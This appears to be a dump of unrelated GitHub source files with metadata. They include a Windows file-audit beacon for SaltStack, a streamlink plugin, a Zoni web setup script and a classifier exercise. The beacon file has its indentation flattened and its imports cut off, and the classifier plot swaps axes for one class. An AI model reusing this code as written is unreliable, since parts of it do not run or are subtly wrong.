import salt.ext.six
import salt.loader
import salt.utils  # needed for salt.utils.is_windows() in __virtual__()
log = logging.getLogger(__name__)
DEFAULT_MASK = ['ExecuteFile', 'Write', 'Delete', 'DeleteSubdirectoriesAndFiles', 'ChangePermissions',
'TakeOwnership'] #ExecuteFile Is really chatty
DEFAULT_TYPE = 'all'
__virtualname__ = 'pulsar'
__version__ = 'v2016.10.3'
CONFIG = None
CONFIG_STALENESS = 0
def __virtual__():
if not salt.utils.is_windows():
return False, 'This module only works on windows'
return __virtualname__
def beacon(config):
'''
Watch the configured files
Example Config
.. code-block:: yaml
beacons:
win_notify:
/path/to/file/or/dir:
mask:
- Write
- ExecuteFile
- Delete
- DeleteSubdirectoriesAndFiles
wtype: all
recurse: True
exclude:
- /path/to/file/or/dir/exclude1
- /path/to/*/file/or/dir/*/exclude2
    The mask list can contain the following events (the default mask is ExecuteFile, Write, Delete,
    DeleteSubdirectoriesAndFiles, ChangePermissions and TakeOwnership):
1. ExecuteFile - Traverse folder / execute file
2. ReadData - List folder / read data
3. ReadAttributes - Read attributes of object
4. ReadExtendedAttributes - Read extended attributes of object
5. CreateFiles - Create files / write data
6. AppendData - Create folders / append data
7. WriteAttributes - Write attributes of object
8. WriteExtendedAttributes - Write extended attributes of object
9. DeleteSubdirectoriesAndFiles - Delete subfolders and files
10. Delete - Delete an object
11. ReadPermissions - Read Permissions of an object
12. ChangePermissions - Change permissions of an object
13. TakeOwnership - Take ownership of an object
14. Write - Combination of 5, 6, 7, 8
15. Read - Combination of 2, 3, 4, 11
16. ReadAndExecute - Combination of 1, 2, 3, 4, 11
17. Modify - Combination of 1, 2, 3, 4, 5, 6, 7, 8, 10, 11
*If you want to monitor everything (A.K.A. Full Control) then you want options 9, 12, 13, 17
recurse:
Recursively watch files in the directory
wtype:
Type of Audit to watch for:
1. Success - Only report successful attempts
2. Fail - Only report failed attempts
3. All - Report both Success and Fail
exclude:
Exclude directories or files from triggering events in the watched directory
:return:
'''
global CONFIG_STALENESS
global CONFIG
if config.get('verbose'):
log.debug('Pulsar beacon called.')
log.debug('Pulsar beacon config from pillar:\n{0}'.format(config))
ret = []
sys_check = 0
# Get config(s) from filesystem if we don't have them already
if CONFIG and CONFIG_STALENESS < config.get('refresh_frequency', 60):
CONFIG_STALENESS += 1
CONFIG.update(config)
CONFIG['verbose'] = config.get('verbose')
config = CONFIG
else:
if config.get('verbose'):
log.debug('No cached config found for pulsar, retrieving fresh from disk.')
new_config = config
if isinstance(config.get('paths'), list):
for path in config['paths']:
if 'salt://' in path:
log.error('Path {0} is not an absolute path. Please use a '
'scheduled cp.cache_file job to deliver the '
'config to the minion, then provide the '
'absolute path to the cached file on the minion '
'in the beacon config.'.format(path))
continue
if os.path.isfile(path):
with open(path, 'r') as f:
new_config = _dict_update(new_config,
yaml.safe_load(f),
recursive_update=True,
merge_lists=True)
else:
log.error('Path {0} does not exist or is not a file'.format(path))
else:
log.error('Pulsar beacon \'paths\' data improperly formatted. Should be list of paths')
new_config.update(config)
config = new_config
CONFIG_STALENESS = 0
CONFIG = config
if config.get('verbose'):
log.debug('Pulsar beacon config (compiled from config list):\n{0}'.format(config))
# Validate Global Auditing with Auditpol
global_check = __salt__['cmd.run']('auditpol /get /category:"Object Access" /r | find "File System"',
python_shell=True)
if global_check:
if not 'Success and Failure' in global_check:
__salt__['cmd.run']('auditpol /set /subcategory:"file system" /success:enable /failure:enable')
sys_check = 1
# Validate ACLs on watched folders/files and add if needed
for path in config:
if path == 'win_notify_interval':
continue
if isinstance(config[path], dict):
mask = config[path].get('mask', DEFAULT_MASK)
wtype = config[path].get('wtype', DEFAULT_TYPE)
recurse = config[path].get('recurse', True)
if isinstance(mask, list) and isinstance(wtype, str) and isinstance(recurse, bool):
success = _check_acl(path, mask, wtype, recurse)
if not success:
confirm = _add_acl(path, mask, wtype, recurse)
sys_check = 1
if config[path].get('exclude', False):
for exclude in config[path]['exclude']:
if '*' in exclude:
for wildcard_exclude in glob.iglob(exclude):
_remove_acl(wildcard_exclude)
else:
_remove_acl(exclude)
    # Read in events since last call. The win_notify_interval time frame is passed to _pull_events in seconds
ret = _pull_events(config['win_notify_interval'])
if sys_check == 1:
log.error('The ACLs were not setup correctly, or global auditing is not enabled. This could have '
'been remedied, but GP might need to be changed')
if __salt__['config.get']('hubblestack:pulsar:maintenance', False):
# We're in maintenance mode, throw away findings
ret = []
if ret and 'return' in config:
__opts__['grains'] = __grains__
__opts__['pillar'] = __pillar__
__returners__ = salt.loader.returners(__opts__, __salt__)
return_config = config['return']
if isinstance(return_config, salt.ext.six.string_types):
tmp = {}
for conf in return_config.split(','):
tmp[conf] = None
return_config = tmp
for returner_mod in return_config:
returner = '{0}.returner'.format(returner_mod)
if returner not in __returners__:
log.error('Could not find {0} returner for pulsar beacon'.format(config['return']))
return ret
batch_config = config.get('batch')
if isinstance(return_config[returner_mod], dict) and return_config[returner_mod].get('batch'):
batch_config = True
if batch_config:
transformed = []
for item in ret:
transformed.append({'return': item})
if config.get('multiprocessing_return', True):
p = threading.Thread(target=_return, args=((transformed,), returner))
p.daemon = True
p.start()
else:
__returners__[returner](transformed)
else:
for item in ret:
if config.get('multiprocessing_return', True):
p = threading.Thread(target=_return, args=(({'return': item},), returner))
p.daemon = True
p.start()
else:
__returners__[returner]({'return': item})
return []
else:
# Return event data
return ret
def _return(args, returner):
__returners__ = salt.loader.returners(__opts__, __salt__)
__returners__[returner](*args)
def _check_acl(path, mask, wtype, recurse):
audit_dict = {}
success = True
if 'all' in wtype.lower():
wtype = ['Success', 'Failure']
else:
wtype = [wtype]
audit_acl = __salt__['cmd.run']('(Get-Acl {0} -Audit).Audit | fl'.format(path), shell='powershell',
python_shell=True)
if not audit_acl:
success = False
return success
audit_acl = audit_acl.replace('\r','').split('\n')
newlines= []
count = 0
for line in audit_acl:
if ':' not in line and count > 0:
newlines[count-1] += line.strip()
else:
newlines.append(line)
count += 1
for line in newlines:
if line:
if ':' in line:
d = line.split(':')
audit_dict[d[0].strip()] = d[1].strip()
for item in mask:
if item not in audit_dict['FileSystemRights']:
success = False
for item in wtype:
if item not in audit_dict['AuditFlags']:
success = False
if 'Everyone' not in audit_dict['IdentityReference']:
success = False
if recurse:
        # both inheritance flags must be present for a recursive watch
        if ('ContainerInherit' not in audit_dict['InheritanceFlags']
                or 'ObjectInherit' not in audit_dict['InheritanceFlags']):
            success = False
else:
if 'None' not in audit_dict['InheritanceFlags']:
success = False
if 'None' not in audit_dict['PropagationFlags']:
success = False
return success
def _add_acl(path, mask, wtype, recurse):
'''
    This will apply the needed audit ACL to the folder in question using PowerShell's access to the .net library and
WMI with the code below:
$path = "C:\Path\here"
$path = path.replace("\","\\")
$user = "Everyone"
$SD = ([WMIClass] "Win32_SecurityDescriptor").CreateInstance()
$Trustee = ([WMIClass] "Win32_Trustee").CreateInstance()
# One for Success and other for Failure events
$ace1 = ([WMIClass] "Win32_ace").CreateInstance()
$ace2 = ([WMIClass] "Win32_ace").CreateInstance()
$SID = (new-object security.principal.ntaccount $user).translate([security.principal.securityidentifier])
[byte[]] $SIDArray = ,0 * $SID.BinaryLength
$SID.GetBinaryForm($SIDArray,0)
$Trustee.Name = $user
$Trustee.SID = $SIDArray
# Auditing
$ace2.AccessMask = 2032127 # [System.Security.AccessControl.FileSystemRights]::FullControl
$ace2.AceFlags = 131 # FAILED_ACCESS_ACE_FLAG (128), CONTAINER_INHERIT_ACE (2), OBJECT_INHERIT_ACE (1)
$ace2.AceType =2 # Audit
$ace2.Trustee = $Trustee
$SD.SACL += $ace1.psobject.baseobject
$SD.SACL += $ace2.psobject.baseobject
$SD.ControlFlags=16
$wPrivilege = Get-WmiObject Win32_LogicalFileSecuritySetting -filter "path='$path'" -EnableAllPrivileges
$wPrivilege.setsecuritydescriptor($SD)
The ACE accessmask map key is below:
1. ReadData - 1
2. CreateFiles - 2
3. AppendData - 4
4. ReadExtendedAttributes - 8
5. WriteExtendedAttributes - 16
6. ExecuteFile - 32
7. DeleteSubdirectoriesAndFiles - 64
8. ReadAttributes - 128
9. WriteAttributes - 256
10. Write - 278 (Combo of CreateFiles, AppendData, WriteAttributes, WriteExtendedAttributes)
11. Delete - 65536
12. ReadPermissions - 131072
13. ChangePermissions - 262144
14. TakeOwnership - 524288
15. Read - 131209 (Combo of ReadData, ReadAttributes, ReadExtendedAttributes, ReadPermissions)
16. ReadAndExecute - 131241 (Combo of ExecuteFile, ReadData, ReadAttributes, ReadExtendedAttributes,
ReadPermissions)
17. Modify - 197055 (Combo of ExecuteFile, ReadData, ReadAttributes, ReadExtendedAttributes,
CreateFiles, AppendData, WriteAttributes, WriteExtendedAttributes,
Delete, ReadPermissions)
The Ace flags map key is below:
1. ObjectInherit - 1
2. ContainerInherit - 2
3. NoPorpagateInherit - 4
4. SuccessfulAccess - 64 (Used with System-audit to generate audit messages for successful access
attempts)
5. FailedAccess - 128 (Used with System-audit to generate audit messages for Failed access attempts)
The Ace type map key is below:
1. Access Allowed - 0
2. Access Denied - 1
3. Audit - 2
If you want multiple values you just add them together to get a desired outcome:
ACCESSMASK of file_add_file, file_add_subdirectory, delete, file_delete_child, write_dac, write_owner:
            852038 = 2 + 4 + 65536 + 64 + 262144 + 524288
FLAGS of ObjectInherit, ContainerInherit, SuccessfullAccess, FailedAccess:
195 = 1 + 2 + 64 + 128
This calls The function _get_ace_translation() to return the number it needs to set.
:return:
'''
path = path.replace('\\','\\\\')
audit_user = 'Everyone'
audit_rules = ','.join(mask)
    if recurse:
        inherit_type = 'ContainerInherit,ObjectInherit'
    else:
        # avoid an UnboundLocalError below when the watch is not recursive
        inherit_type = ''
if 'all' in wtype:
audit_type = 'Success,Failure'
else:
audit_type = wtype
access_mask = _get_ace_translation(audit_rules)
flags = _get_ace_translation(inherit_type, audit_type)
__salt__['cmd.run']('$SD = ([WMIClass] "Win32_SecurityDescriptor").CreateInstance();'
'$Trustee = ([WMIClass] "Win32_Trustee").CreateInstance();'
'$ace = ([WMIClass] "Win32_ace").CreateInstance();'
'$SID = (new-object System.Security.Principal.NTAccount {0}).translate([security.principal.securityidentifier]);'
'[byte[]] $SIDArray = ,0 * $SID.BinaryLength;'
'$SID.GetBinaryForm($SIDArray,0);'
'$Trustee.Name = "{0}";'
'$Trustee.SID = $SIDArray;'
'$ace.AccessMask = {1};'
'$ace.AceFlags = {2};'
'$ace.AceType = 2;'
'$ace.Trustee = $Trustee;'
'$SD.SACL += $ace.psobject.baseobject;'
'$SD.ControlFlags=16;'
'$wPrivilege = Get-WmiObject Win32_LogicalFileSecuritySetting -filter "path=\'{3}\'" -EnableAllPrivileges;'
'$wPrivilege.setsecuritydescriptor($SD)'.format(audit_user, access_mask, flags, path),
shell='powershell', python_shell=True)
return 'ACL set up for {0} - with {1} user, {2} access mask, {3} flags'.format(path, audit_user, access_mask, flags)
def _remove_acl(path):
'''
    This will remove a currently configured ACL on the folder submitted as item. This will be needed when you have
a sub file or folder that you want to explicitly ignore within a folder being monitored. You need to pass in the
full folder path name for this to work properly
:param item:
:return:
'''
path = path.replace('\\','\\\\')
__salt__['cmd.run']('$SD = ([WMIClass] "Win32_SecurityDescriptor").CreateInstance();'
'$SD.ControlFlags=16;'
'$wPrivilege = Get-WmiObject Win32_LogicalFileSecuritySetting -filter "path=\'{0}\'" -EnableAllPrivileges;'
'$wPrivilege.setsecuritydescriptor($SD)'.format(path), shell='powershell', python_shell=True)
def _pull_events(time_frame):
events_list = []
events_output = __salt__['cmd.run_stdout']('mode con:cols=1000 lines=1000; Get-EventLog -LogName Security '
'-After ((Get-Date).AddSeconds(-{0})) -InstanceId 4663 | fl'.format(
time_frame), shell='powershell', python_shell=True)
events = events_output.split('\n\n')
for event in events:
if event:
event_dict = {}
items = event.split('\n')
for item in items:
if ':' in item:
                    item = item.replace('\t', '')
k, v = item.split(':', 1)
event_dict[k.strip()] = v.strip()
event_dict['Accesses'] = _get_access_translation(event_dict['Accesses'])
event_dict['Hash'] = _get_item_hash(event_dict['Object Name'])
#needs hostname, checksum, filepath, time stamp, action taken
events_list.append({k: event_dict[k] for k in ('EntryType', 'Accesses', 'TimeGenerated', 'Object Name', 'Hash')})
return events_list
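# Each returned entry is a trimmed dict along these lines (values are illustrative):
#   {'EntryType': 'SuccessAudit',
#    'Accesses': 'Write Data',
#    'TimeGenerated': '10/3/2016 1:05:00 PM',
#    'Object Name': 'C:\\Watched\\secret.txt',
#    'Hash': '<output of file.get_hash, or "Item is a directory">'}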
def _get_ace_translation(value, *args):
'''
    This will take the ace name and return the total number associated with all the ace accessmasks and flags.
    Below you will find all the names associated with the numbers:
'''
ret = 0
ace_dict = {'ReadData': 1, 'CreateFiles': 2, 'AppendData': 4, 'ReadExtendedAttributes': 8,
'WriteExtendedAttributes': 16, 'ExecuteFile': 32, 'DeleteSubdirectoriesAndFiles': 64,
'ReadAttributes': 128, 'WriteAttributes': 256, 'Write': 278, 'Delete': 65536, 'ReadPermissions': 131072,
'ChangePermissions': 262144, 'TakeOwnership': 524288, 'Read': 131209, 'ReadAndExecute': 131241,
'Modify': 197055, 'ObjectInherit': 1, 'ContainerInherit': 2, 'NoPropagateInherit': 4, 'Success': 64,
'Failure': 128}
aces = value.split(',')
for arg in args:
aces.extend(arg.split(','))
for ace in aces:
if ace in ace_dict:
ret += ace_dict[ace]
return ret
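# Worked example using the mapping above, mirroring the two separate calls made
# by _add_acl (access-mask names and flag names are summed independently):
#   _get_ace_translation('Delete,ChangePermissions,TakeOwnership')
#       -> 65536 + 262144 + 524288 = 851968
#   _get_ace_translation('ContainerInherit,ObjectInherit', 'Success,Failure')
#       -> 1 + 2 + 64 + 128 = 195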
def _get_access_translation(access):
'''
    This will take the access number within the event and return a meaningful translation.
These are all the translations of accesses:
1537 DELETE - used to grant or deny delete access.
1538 READ_CONTROL - used to grant or deny read access to the security descriptor and owner.
1539 WRITE_DAC - used to grant or deny write access to the discretionary ACL.
1540 WRITE_OWNER - used to assign a write owner.
1541 SYNCHRONIZE - used to synchronize access and to allow a process to wait for an object to enter the signaled state.
1542 ACCESS_SYS_SEC
4416 ReadData
4417 WriteData
4418 AppendData
4419 ReadEA (Extended Attribute)
4420 WriteEA (Extended Attribute)
4421 Execute/Traverse
4423 ReadAttributes
4424 WriteAttributes
4432 Query Key Value
4433 Set Key Value
4434 Create Sub Key
4435 Enumerate sub-keys
4436 Notify about changes to keys
4437 Create Link
6931 Print
:param access:
:return access_return:
'''
access_dict = {'1537': 'Delete', '1538': 'Read Control', '1539': 'Write DAC', '1540': 'Write Owner',
'1541': 'Synchronize', '1542': 'Access Sys Sec', '4416': 'Read Data', '4417': 'Write Data',
'4418': 'Append Data', '4419': 'Read EA', '4420': 'Write EA', '4421': 'Execute/Traverse',
'4423': 'Read Attributes', '4424': 'Write Attributes', '4432': 'Query Key Value',
'4433': 'Set Key Value', '4434': 'Create Sub Key', '4435': 'Enumerate Sub-Keys',
'4436': 'Notify About Changes to Keys', '4437': 'Create Link', '6931': 'Print', }
access = access.replace('%%', '').strip()
ret_str = access_dict.get(access, False)
if ret_str:
return ret_str
else:
return 'Access number {0} is not a recognized access code.'.format(access)
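# Example of the translation above: event access codes arrive as strings such as
# '%%4416'; the '%%' prefix is stripped before the lookup.
#   _get_access_translation('%%4416')  # -> 'Read Data'
#   _get_access_translation('9999')    # -> 'Access number 9999 is not a recognized access code.'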
def _get_item_hash(item):
item = item.replace('\\\\','\\')
    if os.path.isfile(item):
hashy = __salt__['file.get_hash']('{0}'.format(item))
return hashy
else:
return 'Item is a directory'
| {
"content_hash": "3a3f0335f77e457ed3822a77da3c682f",
"timestamp": "",
"source": "github",
"line_count": 498,
"max_line_length": 137,
"avg_line_length": 43.062248995983936,
"alnum_prop": 0.5522965726276521,
"repo_name": "HubbleStack/Pulsar",
"id": "06352cef15c0c8396ea3580fc3122445181f59f2",
"size": "21445",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "_beacons/win_pulsar.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "37294"
}
],
"symlink_target": ""
} |
"""
Tokenize words.
__author__ = [email protected], [email protected]
"""
import re
def tokenize(line):
    assert isinstance(line, str), "The input is not a string, was a %r" % type(line)
line = line.strip().lower()
ord = re.split("([^a-zA-Z0-9æøåÆØÅ])", line)
ord = [o for o in ord if o != ' ' and o != '']
return ord
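# Quick sketch of the behaviour: whitespace and empty fragments are dropped,
# while punctuation is kept as separate tokens.
#   tokenize("Hello, World!")  # -> ['hello', ',', 'world', '!']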
| {
"content_hash": "eb32d1e2da4e1247e5403878f839d2b4",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 82,
"avg_line_length": 20.41176470588235,
"alnum_prop": 0.5994236311239193,
"repo_name": "hanscje/PySearch",
"id": "3c72cb408bd1306370db9f9f96367a895060a648",
"size": "353",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Tokenizer/tokenize.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "12329"
}
],
"symlink_target": ""
} |
import logging
import re
from urllib.parse import unquote, urlparse
from streamlink.plugin import Plugin, pluginmatcher
from streamlink.plugin.api import validate
from streamlink.stream import HLSStream
from streamlink.utils.url import update_scheme
log = logging.getLogger(__name__)
@pluginmatcher(re.compile(
r"https?://(?:www\.)?(?:mediaklikk|m4sport|hirado|petofilive)\.hu/"
))
class Mediaklikk(Plugin):
PLAYER_URL = "https://player.mediaklikk.hu/playernew/player.php"
_re_player_manager = re.compile(r"""
mtva_player_manager\.player\s*\(\s*
document\.getElementById\(\s*"\w+"\s*\)\s*,\s*
(?P<json>{.*?})\s*
\)\s*;
""", re.VERBOSE | re.DOTALL)
_re_player_json = re.compile(r"pl\.setup\s*\(\s*(?P<json>{.*?})\s*\)\s*;", re.DOTALL)
def _get_streams(self):
params = self.session.http.get(self.url, schema=validate.Schema(
validate.transform(self._re_player_manager.search),
validate.any(None, validate.all(
validate.get("json"),
validate.parse_json(),
{
"contentId": validate.any(str, int),
validate.optional("streamId"): str,
validate.optional("idec"): str,
validate.optional("token"): str
}
))
))
if not params:
log.error("Could not find player manager data")
return
params.update({
"video": (unquote(params.pop("token"))
if params.get("token") is not None else
params.pop("streamId")),
"noflash": "yes",
"embedded": "0",
})
url_parsed = urlparse(self.url)
skip_vods = url_parsed.netloc.endswith("m4sport.hu") and url_parsed.path.startswith("/elo")
self.session.http.headers.update({"Referer": self.url})
playlists = self.session.http.get(self.PLAYER_URL, params=params, schema=validate.Schema(
validate.transform(self._re_player_json.search),
validate.any(None, validate.all(
validate.get("json"),
validate.parse_json(),
{"playlist": [{
"file": validate.url(),
"type": str
}]},
validate.get("playlist"),
validate.filter(lambda p: p["type"] == "hls"),
validate.filter(lambda p: not skip_vods or "vod" not in p["file"]),
validate.map(lambda p: update_scheme(self.url, p["file"]))
))
))
for url in playlists or []:
yield from HLSStream.parse_variant_playlist(self.session, url).items()
__plugin__ = Mediaklikk
| {
"content_hash": "b158f8f53ad687b83cda4331ac6d5d5e",
"timestamp": "",
"source": "github",
"line_count": 78,
"max_line_length": 99,
"avg_line_length": 35.58974358974359,
"alnum_prop": 0.5435878962536023,
"repo_name": "melmorabity/streamlink",
"id": "6b50bd96157b3b0f41436bb0e234cb782493c00f",
"size": "2776",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/streamlink/plugins/mediaklikk.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Batchfile",
"bytes": "838"
},
{
"name": "Python",
"bytes": "1537432"
},
{
"name": "Shell",
"bytes": "18707"
}
],
"symlink_target": ""
} |
from nvchecker.api import session, GetVersionError
URL = 'https://www.archlinux.org/packages/search/json/'
async def request(pkg):
res = await session.get(URL, params={"name": pkg})
return res.json()
async def get_version(name, conf, *, cache, **kwargs):
pkg = conf.get('archpkg') or name
strip_release = conf.get('strip_release', False)
provided = conf.get('provided')
data = await cache.get(pkg, request)
if not data['results']:
raise GetVersionError('Arch package not found')
r = [r for r in data['results'] if r['repo'] != 'testing'][0]
if provided:
provides = dict(x.split('=', 1) for x in r['provides'] if '=' in x)
version = provides.get(provided, None)
if strip_release:
version = version.split('-', 1)[0]
elif strip_release:
version = r['pkgver']
else:
version = r['pkgver'] + '-' + r['pkgrel']
return version
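# Hedged illustration of the resulting version string, assuming the repository
# reports pkgver "1.2.3" and pkgrel "4" for the package (hypothetical values):
#   default                -> "1.2.3-4"
#   strip_release = True   -> "1.2.3"
#   provided = "libfoo.so" -> the version is read from the matching "provides"
#                             entry instead (hypothetical library name)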
| {
"content_hash": "dfbc7b55ac13b450d25b89f13ac482dd",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 71,
"avg_line_length": 28.419354838709676,
"alnum_prop": 0.6435868331441543,
"repo_name": "lilydjwg/nvchecker",
"id": "de321c4e9254bc3de5cb7445de0318a70dd56cd9",
"size": "961",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "nvchecker_source/archpkg.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "146836"
}
],
"symlink_target": ""
} |
import nose
import requests
import fixture
@nose.with_setup(fixture.start_tangelo, fixture.stop_tangelo)
def test_version():
response = requests.get(fixture.plugin_url("tangelo", "version"))
expected = "0.8.1-dev"
assert response.content == expected
| {
"content_hash": "e0385dfdf5c48b74c0c216743f5fbc17",
"timestamp": "",
"source": "github",
"line_count": 12,
"max_line_length": 69,
"avg_line_length": 22.166666666666668,
"alnum_prop": 0.7255639097744361,
"repo_name": "mathstuf/tangelo",
"id": "fbf6aa035a95d405be3d6dc4f9c0703553d3e1a2",
"size": "266",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "tests/tangelo-version.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ApacheConf",
"bytes": "1551"
},
{
"name": "HTML",
"bytes": "49052"
},
{
"name": "JavaScript",
"bytes": "427413"
},
{
"name": "Python",
"bytes": "125716"
}
],
"symlink_target": ""
} |
#!/usr/bin/env python
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# $Id$
#
import os
import sys
import time
import string
import traceback
import optparse
import shutil
import urllib
import tarfile
a = os.path.join("../")
sys.path.append(a)
a = os.path.join("../../")
sys.path.append(a)
a = os.path.join("../../..")
sys.path.append(a)
from zoni.extra.util import *
from zoni.version import *
from zoni.bootstrap.pxe import Pxe
def main():
''' This file sets up the web files for Zoni '''
ver = version.split(" ")[0]
rev = revision
parser = optparse.OptionParser(usage="%prog ", version="%prog " + ver + " " + rev)
(options, args) = parser.parse_args()
(configs, configFiles) = getConfig()
ZoniWebSetup(configs)
ZoniCreateWebConfigFile(configs)
def ZoniCreateWebConfigFile(config):
zoniBaseDir = config['installBaseDir']
docRoot = config['wwwDocumentRoot']
baseDir = config['registrationBaseDir']
dbHost = config['dbHost']
dbPort = str(config['dbPort'])
dbInst = config['dbInst']
dbUser = config['dbUser']
dbPassword = config['dbPassword']
zoniHomeDomain = config['zoniHomeDomain']
zoniHomeNetwork = config['zoniHomeNetwork']
zoniIpmiNetwork = config['zoniIpmiNetwork']
zoniRoot = os.path.join(docRoot, baseDir)
includeDir = os.path.join(docRoot, baseDir, "include")
includeFile = os.path.join(includeDir, "zoni_www_registration.conf")
a = "<?php\n"
a += "/* Generated by Zoni on " + time.asctime() + " */\n\n\n"
a += "function init_globals() {\n"
a += " $G = array();\n"
a += "\n"
a += " // Zoni Install Base\n";
a += " $G['ZONI_BASE_DIR'] = \"" + zoniBaseDir + "\";\n"
a += "\n"
a += " // webserver directories\n";
a += " $G['ABSROOT'] = \"" + zoniRoot + "\";\n"
a += " $G['WEBROOT'] = \"" + baseDir + "\";\n"
a += "\n"
a += " // DB info\n";
a += " $G['DB_HOST'] = \"" + dbHost + "\";\n"
a += " $G['DB_USER'] = \"" + dbUser + "\";\n"
a += " $G['DB_PASS'] = \"" + dbPassword + "\";\n"
a += " $G['DB_INST'] = \"" + dbInst + "\";\n"
a += " $G['DB_PORT'] = \"" + dbPort + "\";\n"
a += "\n"
a += " // Zoni Home Domain \n";
a += " $G['ZONI_HOME_DOMAIN'] = \"" + zoniHomeDomain + "\";\n"
a += " $G['ZONI_HOME_NETWORK'] = \"" + zoniHomeNetwork + "\";\n"
a += " $G['ZONI_IPMI_NETWORK'] = \"" + zoniIpmiNetwork + "\";\n"
a += "\n"
a += " ini_set('display_errors', 1);\n"
a += " ini_set('error_reporting', E_ALL);\n"
a += "\n"
a += " return $G;\n"
a += "}\n"
a += "?>\n"
# Rename any existing
if os.path.exists(includeFile):
includeFileBak = os.path.join(includeFile + "." + str(int(time.time())))
shutil.move(includeFile, includeFileBak)
f = open(includeFile, "w")
f.write(a)
f.close()
@checkSuper
def ZoniWebSetup(config):
docRoot = config['wwwDocumentRoot']
baseDir = config['registrationBaseDir']
zoniInstallDir = config['installBaseDir']
zoniWebRoot = os.path.join(docRoot, baseDir )
if not (createDir(zoniWebRoot, 1)): print "Please use sudo"; exit()
zoniIncludeDir = os.path.join(zoniWebRoot, "include")
createDir(zoniIncludeDir)
zoniRegisterDir = os.path.join(zoniWebRoot, "register")
createDir(zoniRegisterDir)
sys.stdout.write(" Copying zoni_function.php\n")
zoniIncludeSrcFile = os.path.join(zoniInstallDir, "src", "zoni", "system", "registration", "www", "include", "zoni_functions.php")
shutil.copy(zoniIncludeSrcFile, zoniIncludeDir)
sys.stdout.write(" Copying register_node\n")
zoniRegisterSrcFile = os.path.join(zoniInstallDir, "src", "zoni", "system", "registration", "register", "register_node")
shutil.copy(zoniRegisterSrcFile, zoniRegisterDir)
sys.stdout.write(" Copying register_automate\n")
zoniRegisterAutoSrcFile = os.path.join(zoniInstallDir, "src", "zoni", "system", "registration", "register", "register_automate")
shutil.copy(zoniRegisterAutoSrcFile, zoniRegisterDir)
sys.stdout.write(" Copying zoni-register.php\n")
zoniRegisterSrcFile = os.path.join(zoniInstallDir, "src", "zoni", "system", "registration", "www", "zoni-register.php")
shutil.copy(zoniRegisterSrcFile, zoniWebRoot)
if __name__ == "__main__":
main()
| {
"content_hash": "36be6b32cc54016afe1e3ac5365f804e",
"timestamp": "",
"source": "github",
"line_count": 151,
"max_line_length": 132,
"avg_line_length": 31.894039735099337,
"alnum_prop": 0.6619601328903655,
"repo_name": "apache/tashi",
"id": "3b2fa1a81858f43a235d07ed86d10b994d425e40",
"size": "4816",
"binary": false,
"copies": "1",
"ref": "refs/heads/cmu",
"path": "src/zoni/install/www/zoniWebSetup.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "3092"
},
{
"name": "Makefile",
"bytes": "7418"
},
{
"name": "PHP",
"bytes": "28750"
},
{
"name": "Python",
"bytes": "573021"
},
{
"name": "Shell",
"bytes": "25933"
},
{
"name": "Thrift",
"bytes": "7777"
}
],
"symlink_target": ""
} |
import matplotlib.pyplot as plt
from prep_terrain_data import makeTerrainData
from class_vis import prettyPicture
from time import time
features_train, labels_train, features_test, labels_test = makeTerrainData()
### the training data (features_train, labels_train) have both "fast" and "slow" points mixed
### in together--separate them so we can give them different colors in the scatterplot,
### and visually identify them
grade_fast = [features_train[ii][0] for ii in range(0, len(features_train)) if labels_train[ii]==0]
bumpy_fast = [features_train[ii][1] for ii in range(0, len(features_train)) if labels_train[ii]==0]
grade_slow = [features_train[ii][0] for ii in range(0, len(features_train)) if labels_train[ii]==1]
bumpy_slow = [features_train[ii][1] for ii in range(0, len(features_train)) if labels_train[ii]==1]
#### initial visualization
plt.xlim(0.0, 1.0)
plt.ylim(0.0, 1.0)
plt.scatter(bumpy_fast, grade_fast, color = "b", label="fast")
plt.scatter(grade_slow, bumpy_slow, color = "r", label="slow")
plt.legend()
plt.xlabel("bumpiness")
plt.ylabel("grade")
plt.show()
#################################################################################
### your code here! name your classifier object clf if you want the
### visualization code (prettyPicture) to show you the decision boundary
# K Nearest Neighbor
from sklearn.neighbors import KNeighborsClassifier
from sklearn.metrics import accuracy_score
clf = KNeighborsClassifier(n_neighbors=1)
t0 = time()
clf.fit(features_train, labels_train)
print "training time:", round(time()-t0, 3), "s"
t0 = time()
pred = clf.predict(features_test)
print "predicting time:", round(time()-t0, 3), "s"
acc = accuracy_score(pred, labels_test)
print acc
# Random Forest
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import accuracy_score
clf = RandomForestClassifier(n_estimators=10)
t0 = time()
clf.fit(features_train, labels_train)
print "training time:", round(time()-t0, 3), "s"
t0 = time()
pred = clf.predict(features_test)
print "predicting time:", round(time()-t0, 3), "s"
acc = accuracy_score(pred, labels_test)
print acc
# AdaBoost
from sklearn.ensemble import AdaBoostClassifier
from sklearn.metrics import accuracy_score
clf = AdaBoostClassifier(n_estimators=100)
t0 = time()
clf.fit(features_train, labels_train)
print "training time:", round(time()-t0, 3), "s"
t0 = time()
pred = clf.predict(features_test)
print "predicting time:", round(time()-t0, 3), "s"
acc = accuracy_score(pred, labels_test)
print acc
try:
prettyPicture(clf, features_test, labels_test)
except NameError:
pass
| {
"content_hash": "3c68157c5afbd38b31ea47a36bb4b2be",
"timestamp": "",
"source": "github",
"line_count": 82,
"max_line_length": 99,
"avg_line_length": 31.817073170731707,
